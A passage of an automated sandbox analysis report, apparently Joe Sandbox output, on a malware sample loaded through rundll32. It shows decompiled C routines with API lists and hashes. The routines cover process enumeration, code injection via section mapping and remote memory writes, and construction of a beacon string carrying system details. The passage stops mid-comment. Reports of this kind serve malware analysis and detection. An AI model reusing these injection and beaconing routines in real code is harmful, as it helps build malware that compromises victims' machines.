                            				void* _t17;
                            
                            				_t15 = 0;
                            				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                            				_t17 = _t5;
                            				if(_t17 != 0) {
                            					_t8 = Process32First(_t17,  &_v300);
                            					while(_t8 != 0) {
                            						_t9 =  *0x4a1a348; // 0xb1d5a8
                            						_t2 = _t9 + 0x4a1beb0; // 0x73617661
                            						_push( &_v264);
                            						if( *0x4a1a12c() != 0) {
                            							_t15 = 1;
                            						} else {
                            							_t8 = Process32Next(_t17,  &_v300);
                            							continue;
                            						}
                            						L7:
                            						FindCloseChangeNotification(_t17); // executed
                            						goto L8;
                            					}
                            					goto L7;
                            				}
                            				L8:
                            				return _t15;
                            			}

                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04A168CD
                            • Process32First.KERNEL32(00000000,?), ref: 04A168E0
                            • Process32Next.KERNEL32(00000000,?), ref: 04A1690C
                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 04A1691B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                            • String ID:
                            • API String ID: 3243318325-0
                            • Opcode ID: 14bfaf66334c1e1bf7eb0cb88744cfd791afdf5d9f33bed9badf99db2d650a71
                            • Instruction ID: b7676636ec35756119909c29330e74a7e454172a62fb7eb11f9bf5d543e73899
                            • Opcode Fuzzy Hash: 14bfaf66334c1e1bf7eb0cb88744cfd791afdf5d9f33bed9badf99db2d650a71
                            • Instruction Fuzzy Hash: 87F0BBB62011146BE720AB769D48EEB37ACDBC5315F0000A1EE45D3020EB24FE4AC661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,761B4EE0,00000000,00000000), ref: 04F67167
                              • Part of subcall function 04F7BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,04F6717E,00000000,00000000,04F6717E,?,00000002,00000000,?,04F6C71A,00000000,04F6717E,000000FF,?), ref: 04F7BEAE
                            • memset.NTDLL ref: 04F6718B
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Section$CreateViewmemset
                            • String ID: @
                            • API String ID: 2533685722-2766056989
                            • Opcode ID: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                            • Instruction ID: dac90817f790fbdfef35c35a4fa1b853f3e02f831f68cb490cac611bd596cafe
                            • Opcode Fuzzy Hash: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                            • Instruction Fuzzy Hash: 7321FCB6D00209AFDB11DFA9C8809EEFBF9EB48354F10452AE516F7250D630AA458F60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetProcAddress.KERNEL32(?,00000318), ref: 04F761D3
                            • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04F761EF
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                              • Part of subcall function 04F7A806: GetProcAddress.KERNEL32(?,00000000), ref: 04F7A82F
                              • Part of subcall function 04F7A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04F76230,00000000,00000000,00000028,00000100), ref: 04F7A851
                            • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04F76359
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                            • String ID:
                            • API String ID: 3547194813-0
                            • Opcode ID: a19b3321ae5cd624dd8b137fd86f348b1d8802ac424fb894d47391f9fd5b1e5f
                            • Instruction ID: 9988fb2ef48460ad06bcf67cbfdc0c188eae725b7b527f50dd58bb34f6beefde
                            • Opcode Fuzzy Hash: a19b3321ae5cd624dd8b137fd86f348b1d8802ac424fb894d47391f9fd5b1e5f
                            • Instruction Fuzzy Hash: 36612F71E0060AABEF55DF94C880BAEB7B4FF08314F10455AE914EB391D778E956CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F70796
                            • GetProcAddress.KERNEL32(?), ref: 04F707BE
                            • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 04F707DC
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressInformationProcProcess64QueryWow64memset
                            • String ID:
                            • API String ID: 2968673968-0
                            • Opcode ID: fbb68ee809242cffa8337450d5dc1372bb970260886d903be7419f9779d304ce
                            • Instruction ID: 0ada9e8df7962789f72add79e1dda61ff624b1db99cb644fbaaff104acceccdf
                            • Opcode Fuzzy Hash: fbb68ee809242cffa8337450d5dc1372bb970260886d903be7419f9779d304ce
                            • Instruction Fuzzy Hash: F2113375A0111DAFEB10DB94EC45FAA77A8EF44744F05402AE904EF290DB78ED06CF61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(04F7EB0F,00000000,00000000,04F7EB0F,00003000,00000040), ref: 04F77981
                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04F77988
                            • SetLastError.KERNEL32(00000000), ref: 04F7798F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Error$AllocateLastMemoryStatusVirtual
                            • String ID:
                            • API String ID: 722216270-0
                            • Opcode ID: 20910521b9fb9256d9a0eb97754dbcb9dd6d21ca744a8a665ec3a55c817272d3
                            • Instruction ID: f1a53a56a84f44de751163f5d9610bc50907fd9151cae7ff4d4e8eba43f610ec
                            • Opcode Fuzzy Hash: 20910521b9fb9256d9a0eb97754dbcb9dd6d21ca744a8a665ec3a55c817272d3
                            • Instruction Fuzzy Hash: 2DF0FEB1921309FBEB05DB94D909FAE7ABCEB44359F104048A600AA180DBB8AB04DB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,761B6780,?,04F7907F,?,00000004,00000000,00000004,?), ref: 04F75330
                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 04F7533F
                            • SetLastError.KERNEL32(00000000,?,04F7907F,?,00000004,00000000,00000004,?,?,?,?,04F6C691,?,00000000,CCCCFEEB,?), ref: 04F75346
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Error$LastMemoryStatusVirtualWrite
                            • String ID:
                            • API String ID: 1089604434-0
                            • Opcode ID: 350a402272ed90be9762b3618923f34f5f2657c8b255ab0f1be4e5b8edc15457
                            • Instruction ID: 220bd08edbd6da755d9b314ed134fcfffd5f70f4f73dad4dfe8cad30c58a5641
                            • Opcode Fuzzy Hash: 350a402272ed90be9762b3618923f34f5f2657c8b255ab0f1be4e5b8edc15457
                            • Instruction Fuzzy Hash: 0CE09A3660021EBBCF015EE8AC04DAE7F6AEB48751B405019FE05D6520D679D861ABA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E04A1190C(intOrPtr* __eax, void** _a4) {
                            				int _v12;
                            				void* _v16;
                            				void* _v20;
                            				void* _v24;
                            				int _v28;
                            				int _v32;
                            				intOrPtr _v36;
                            				int _v40;
                            				int _v44;
                            				void* _v48;
                            				void* __esi;
                            				long _t34;
                            				void* _t39;
                            				void* _t47;
                            				intOrPtr* _t48;
                            
                            				_t48 = __eax;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_v24 =  *((intOrPtr*)(__eax + 4));
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v48 = 0x18;
                            				_v44 = 0;
                            				_v36 = 0x40;
                            				_v40 = 0;
                            				_v32 = 0;
                            				_v28 = 0;
                            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                            				if(_t34 < 0) {
                            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                            				} else {
                            					 *_t48 = _v16;
                            					_t39 = E04A16D0A(_t48,  &_v12); // executed
                            					_t47 = _t39;
                            					if(_t47 != 0) {
                            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                            					} else {
                            						memset(_v12, 0, _v24);
                            						 *_a4 = _v12;
                            					}
                            				}
                            				return _t47;
                             			}

                            APIs
                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,761B4EE0,00000000,00000000,04A1459D), ref: 04A11969
                              • Part of subcall function 04A16D0A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04A1197E,00000002,00000000,?,?,00000000,?,?,04A1197E,00000000), ref: 04A16D37
                            • memset.NTDLL ref: 04A1198B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Section$CreateViewmemset
                            • String ID:
                            • API String ID: 2533685722-0
                            • Opcode ID: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                            • Instruction ID: 3e7c116ce9f6b163876086b780bfca11a5ad5c61f29ae8acb0d4d0fe55827e7b
                            • Opcode Fuzzy Hash: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                            • Instruction Fuzzy Hash: 0D211FB5D00209AFDB11DFA9C8849EEFBF9EF48354F144829E615F3210D730AA488B65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetProcAddress.KERNEL32(?,00000000), ref: 04F7A82F
                            • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04F76230,00000000,00000000,00000028,00000100), ref: 04F7A851
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressMemory64ProcReadVirtualWow64
                            • String ID:
                            • API String ID: 752694512-0
                            • Opcode ID: 36ecbd1f4f3779a00260ce2a7d1305e6065dcceefb6e905214c396badc4efedd
                            • Instruction ID: 8c752e499c044ecce71bb8e0bc5bc882846ebfe8336fec7976bd0fbdf27237c2
                            • Opcode Fuzzy Hash: 36ecbd1f4f3779a00260ce2a7d1305e6065dcceefb6e905214c396badc4efedd
                            • Instruction Fuzzy Hash: A7F01D76900508FFCB128F99EC44CAEBBB9EB88710B14411EF904CB220D379E952DF20
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtMapViewOfSection.NTDLL(00000000,000000FF,04F6717E,00000000,00000000,04F6717E,?,00000002,00000000,?,04F6C71A,00000000,04F6717E,000000FF,?), ref: 04F7BEAE
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: SectionView
                            • String ID:
                            • API String ID: 1323581903-0
                            • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                            • Instruction ID: dcd39304411b7992983ef1939e4e4e7b094b5abe68ebc40e11e1211eadc4aef2
                            • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                            • Instruction Fuzzy Hash: 23F012B690020CFFDB119FA5CC85CDFBBBDEB44344B00882AF642D5150D231AE199B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E04A16D0A(void** __esi, PVOID* _a4) {
                            				long _v8;
                            				void* _v12;
                            				void* _v16;
                            				long _t13;
                            
                            				_v16 = 0;
                            				asm("stosd");
                            				_v8 = 0;
                            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                            				if(_t13 < 0) {
                            					_push(_t13);
                            					return __esi[6]();
                            				}
                            				return 0;
                             			}

                            APIs
                            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04A1197E,00000002,00000000,?,?,00000000,?,?,04A1197E,00000000), ref: 04A16D37
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: SectionView
                            • String ID:
                            • API String ID: 1323581903-0
                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                            • Instruction ID: c24c3ef97fc25ba9c40d5cc1ee3f50ea84041a10fe7adc20b8a9baa9901e43eb
                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                            • Instruction Fuzzy Hash: 07F037B590060CFFDB119FA5CC85C9FBBBDEB44394F104939F152E50A0D630AE089B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,04F8A400), ref: 04F674C5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InformationProcessQuery
                            • String ID:
                            • API String ID: 1778838933-0
                            • Opcode ID: f7fe5d42370105294ebcd18b5390238de3f0b52fb035120fe880389be4dd7daa
                            • Instruction ID: 1954cec9ef24f01ca03a3b7d02c0c5adb5127432468720afadf76faebeb9e8be
                            • Opcode Fuzzy Hash: f7fe5d42370105294ebcd18b5390238de3f0b52fb035120fe880389be4dd7daa
                            • Instruction Fuzzy Hash: 8FF05E31B00159DBC720EE69E888EABBBE9FB45758B104114ED06DB260D734FD06CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 70%
                            			E04A156C8(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
                            				intOrPtr _v4;
                            				intOrPtr _v8;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				void* _v48;
                            				intOrPtr _v56;
                            				void* __edi;
                            				intOrPtr _t32;
                            				void* _t33;
                            				intOrPtr _t35;
                            				intOrPtr _t36;
                            				intOrPtr _t37;
                            				intOrPtr _t38;
                            				intOrPtr _t39;
                            				void* _t42;
                            				intOrPtr _t43;
                            				int _t46;
                            				intOrPtr _t47;
                            				int _t50;
                            				void* _t51;
                            				intOrPtr _t55;
                            				intOrPtr _t56;
                            				intOrPtr _t62;
                            				intOrPtr _t66;
                            				intOrPtr* _t68;
                            				void* _t69;
                            				intOrPtr _t74;
                            				intOrPtr _t80;
                            				intOrPtr _t83;
                            				intOrPtr _t86;
                            				int _t89;
                            				intOrPtr _t90;
                            				int _t93;
                            				intOrPtr _t95;
                            				int _t98;
                            				intOrPtr _t100;
                            				int _t103;
                            				void* _t105;
                            				void* _t106;
                            				void* _t110;
                            				void* _t112;
                            				void* _t113;
                            				intOrPtr _t114;
                            				long _t116;
                            				intOrPtr* _t117;
                            				intOrPtr* _t118;
                            				long _t119;
                            				int _t120;
                            				void* _t121;
                            				void* _t122;
                            				void* _t123;
                            				void* _t126;
                            				void* _t127;
                            				void* _t129;
                            				void* _t130;
                            
                            				_t110 = __edx;
                            				_t106 = __ecx;
                            				_t127 =  &_v16;
                            				_t119 = __eax;
                            				_t32 =  *0x4a1a3e0; // 0x5539b78
                            				_v4 = _t32;
                            				_v8 = 8;
                            				_t33 = RtlAllocateHeap( *0x4a1a2d8, 0, 0x800); // executed
                            				_t105 = _t33;
                            				if(_t105 != 0) {
                            					if(_t119 == 0) {
                            						_t119 = GetTickCount();
                            					}
                            					_t35 =  *0x4a1a018; // 0x59144415
                            					asm("bswap eax");
                            					_t36 =  *0x4a1a014; // 0x3a87c8cd
                            					asm("bswap eax");
                            					_t37 =  *0x4a1a010; // 0xd8d2f808
                            					asm("bswap eax");
                            					_t38 =  *0x4a1a00c; // 0xeec43f25
                            					asm("bswap eax");
                            					_t39 =  *0x4a1a348; // 0xb1d5a8
                            					_t3 = _t39 + 0x4a1b62b; // 0x74666f73
                            					_t120 = wsprintfA(_t105, _t3, 2, 0x3d175, _t38, _t37, _t36, _t35,  *0x4a1a02c,  *0x4a1a004, _t119);
                            					_t42 = E04A16927();
                            					_t43 =  *0x4a1a348; // 0xb1d5a8
                            					_t4 = _t43 + 0x4a1b66b; // 0x74707526
                            					_t46 = wsprintfA(_t120 + _t105, _t4, _t42);
                            					_t129 = _t127 + 0x38;
                            					_t121 = _t120 + _t46;
                            					if(_a12 != 0) {
                            						_t100 =  *0x4a1a348; // 0xb1d5a8
                            						_t8 = _t100 + 0x4a1b676; // 0x732526
                            						_t103 = wsprintfA(_t121 + _t105, _t8, _a12);
                            						_t129 = _t129 + 0xc;
                            						_t121 = _t121 + _t103;
                            					}
                            					_t47 =  *0x4a1a348; // 0xb1d5a8
                            					_t10 = _t47 + 0x4a1b2de; // 0x74636126
                            					_t50 = wsprintfA(_t121 + _t105, _t10, 0);
                            					_t130 = _t129 + 0xc;
                            					_t122 = _t121 + _t50; // executed
                            					_t51 = E04A122D7(_t106); // executed
                            					_t112 = _t51;
                            					if(_t112 != 0) {
                            						_t95 =  *0x4a1a348; // 0xb1d5a8
                            						_t12 = _t95 + 0x4a1b8d0; // 0x736e6426
                            						_t98 = wsprintfA(_t122 + _t105, _t12, _t112);
                            						_t130 = _t130 + 0xc;
                            						_t122 = _t122 + _t98;
                            						HeapFree( *0x4a1a2d8, 0, _t112);
                            					}
                            					_t113 = E04A12A11();
                            					if(_t113 != 0) {
                            						_t90 =  *0x4a1a348; // 0xb1d5a8
                            						_t14 = _t90 + 0x4a1b8d8; // 0x6f687726
                            						_t93 = wsprintfA(_t122 + _t105, _t14, _t113);
                            						_t130 = _t130 + 0xc;
                            						_t122 = _t122 + _t93;
                            						HeapFree( *0x4a1a2d8, 0, _t113);
                            					}
                            					_t114 =  *0x4a1a3cc; // 0x55395b0
                            					_a20 = E04A12509(0x4a1a00a, _t114 + 4);
                            					_t55 =  *0x4a1a370; // 0x0
                            					_t116 = 0;
                            					if(_t55 != 0) {
                            						_t86 =  *0x4a1a348; // 0xb1d5a8
                            						_t17 = _t86 + 0x4a1b8b2; // 0x3d736f26
                            						_t89 = wsprintfA(_t122 + _t105, _t17, _t55);
                            						_t130 = _t130 + 0xc;
                            						_t122 = _t122 + _t89;
                            					}
                            					_t56 =  *0x4a1a36c; // 0x0
                            					if(_t56 != _t116) {
                            						_t83 =  *0x4a1a348; // 0xb1d5a8
                            						_t19 = _t83 + 0x4a1b889; // 0x3d706926
                            						wsprintfA(_t122 + _t105, _t19, _t56);
                            					}
                            					if(_a20 != _t116) {
                            						_t123 = RtlAllocateHeap( *0x4a1a2d8, _t116, 0x800);
                            						if(_t123 != _t116) {
                            							E04A11BE9(GetTickCount());
                            							_t62 =  *0x4a1a3cc; // 0x55395b0
                            							__imp__(_t62 + 0x40);
                            							asm("lock xadd [eax], ecx");
                            							_t66 =  *0x4a1a3cc; // 0x55395b0
                            							__imp__(_t66 + 0x40);
                            							_t68 =  *0x4a1a3cc; // 0x55395b0
                            							_t69 = E04A11D33(1, _t110, _t105,  *_t68); // executed
                            							_t126 = _t69;
                            							asm("lock xadd [eax], ecx");
                            							if(_t126 != _t116) {
                            								StrTrimA(_t126, 0x4a1928c);
                            								_push(_t126);
                            								_t74 = E04A1393C();
                            								_v20 = _t74;
                            								if(_t74 != _t116) {
                            									_t117 = __imp__;
                            									 *_t117(_t126, _v8);
                            									 *_t117(_t123, _v8);
                            									_t118 = __imp__;
                            									 *_t118(_t123, _v32);
                            									 *_t118(_t123, _t126);
                            									_t80 = E04A1375F(0xffffffffffffffff, _t123, _v28, _v24); // executed
                            									_v56 = _t80;
                            									if(_t80 != 0 && _t80 != 0x10d2) {
                            										E04A1561E();
                            									}
                            									HeapFree( *0x4a1a2d8, 0, _v48);
                            									_t116 = 0;
                            								}
                            								HeapFree( *0x4a1a2d8, _t116, _t126);
                            							}
                            							RtlFreeHeap( *0x4a1a2d8, _t116, _t123); // executed
                            						}
                            						HeapFree( *0x4a1a2d8, _t116, _a12);
                            					}
                            					RtlFreeHeap( *0x4a1a2d8, _t116, _t105); // executed
                            				}
                            				return _v16;
                             			}

                            APIs
                            • RtlAllocateHeap.NTDLL ref: 04A156F0
                            • GetTickCount.KERNEL32 ref: 04A15704
                            • wsprintfA.USER32 ref: 04A15753
                            • wsprintfA.USER32 ref: 04A15770
                            • wsprintfA.USER32 ref: 04A15791
                            • wsprintfA.USER32 ref: 04A157A9
                            • wsprintfA.USER32 ref: 04A157CC
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04A157DC
                            • wsprintfA.USER32 ref: 04A157FE
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04A1580E
                            • wsprintfA.USER32 ref: 04A15847
                            • wsprintfA.USER32 ref: 04A15867
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04A15882
                            • GetTickCount.KERNEL32 ref: 04A15892
                            • RtlEnterCriticalSection.NTDLL(05539570), ref: 04A158A6
                            • RtlLeaveCriticalSection.NTDLL(05539570), ref: 04A158C4
                            • StrTrimA.SHLWAPI(00000000,04A1928C,00000000,055395B0), ref: 04A158F6
                            • lstrcpy.KERNEL32(00000000,?), ref: 04A15915
                            • lstrcpy.KERNEL32(00000000,?), ref: 04A1591C
                            • lstrcat.KERNEL32(00000000,?), ref: 04A15929
                            • lstrcat.KERNEL32(00000000,00000000), ref: 04A1592D
                            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04A1595D
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04A1596D
                            • RtlFreeHeap.NTDLL(00000000,00000000,00000000,055395B0), ref: 04A1597B
                            • HeapFree.KERNEL32(00000000,?), ref: 04A1598C
                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 04A1599A
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Heap$wsprintf$Free$AllocateCountCriticalSectionTicklstrcatlstrcpy$EnterLeaveTrim
                            • String ID:
                            • API String ID: 2591679948-0
                            • Opcode ID: ce7cb0c7c3b06b2b33974e670d59db69d0d8123daefaa0855a84f03b73aed297
                            • Instruction ID: e819d8dbd24c7ded4e32f067baba6e5f26c4f13a73a509c715fe1e479b248686
                            • Opcode Fuzzy Hash: ce7cb0c7c3b06b2b33974e670d59db69d0d8123daefaa0855a84f03b73aed297
                            • Instruction Fuzzy Hash: 1481E3B1901204AFE712EF64EC48E9B3BECEB98710B050525F949D7231D739ED06DB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04F7E846), ref: 04F63528
                            • RtlDeleteCriticalSection.NTDLL(04F8A3E0), ref: 04F6355B
                            • RtlDeleteCriticalSection.NTDLL(04F8A400), ref: 04F63562
                            • ReleaseMutex.KERNEL32(000005C8,00000000,?,?,?,04F7E846), ref: 04F6358B
                            • CloseHandle.KERNEL32(?,?,04F7E846), ref: 04F63597
                            • ResetEvent.KERNEL32(00000000,00000000,?,?,?,04F7E846), ref: 04F635A3
                            • CloseHandle.KERNEL32(?,?,04F7E846), ref: 04F635AF
                            • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04F7E846), ref: 04F635B5
                            • SleepEx.KERNEL32(00000064,00000001,?,?,04F7E846), ref: 04F635C9
                            • HeapFree.KERNEL32(00000000,00000000,?,?,04F7E846), ref: 04F635ED
                            • RtlRemoveVectoredExceptionHandler.NTDLL(04FC05B8), ref: 04F63623
                            • SleepEx.KERNEL32(00000064,00000001,?,?,04F7E846), ref: 04F6363F
                            • FindCloseChangeNotification.KERNEL32(0631F2C0,?,?,04F7E846), ref: 04F63668
                            • LocalFree.KERNEL32(?,?,04F7E846), ref: 04F63678
                              • Part of subcall function 04F61268: GetVersion.KERNEL32(?,?,7620F720,?,04F63517,00000000,?,?,?,04F7E846), ref: 04F6128C
                              • Part of subcall function 04F61268: GetModuleHandleA.KERNEL32(?,063197B5,?,7620F720,?,04F63517,00000000,?,?,?,04F7E846), ref: 04F612A9
                              • Part of subcall function 04F61268: GetProcAddress.KERNEL32(00000000), ref: 04F612B0
                              • Part of subcall function 04F7E869: RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F7E873
                              • Part of subcall function 04F7E869: RtlLeaveCriticalSection.NTDLL(04F8A400), ref: 04F7E8AF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSectionSleep$CloseHandle$DeleteFree$AddressChangeEnterEventExceptionFindHandlerHeapLeaveLocalModuleMutexNotificationProcReleaseRemoveResetVectoredVersion
                            • String ID:
                            • API String ID: 1047430009-0
                            • Opcode ID: dc3a98eb0f94f4643d19dcbc321e64dd7b5c142d4a4628563a091b2ca05933e6
                            • Instruction ID: 436c85120f8ee381fe2aaded5189c5d91fab1f660a84e4c19bcd33faed0b147a
                            • Opcode Fuzzy Hash: dc3a98eb0f94f4643d19dcbc321e64dd7b5c142d4a4628563a091b2ca05933e6
                            • Instruction Fuzzy Hash: 98414171F0061AABEB20AF65FD84A2577A9EB00B55B45102EE902DF290DB7DFC42CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 92%
                            			// WinINet client setup for the sample's HTTP channel. __esi points to a
                            			// connection context: +0 host name, +4 URL path, +0x10 hInternet,
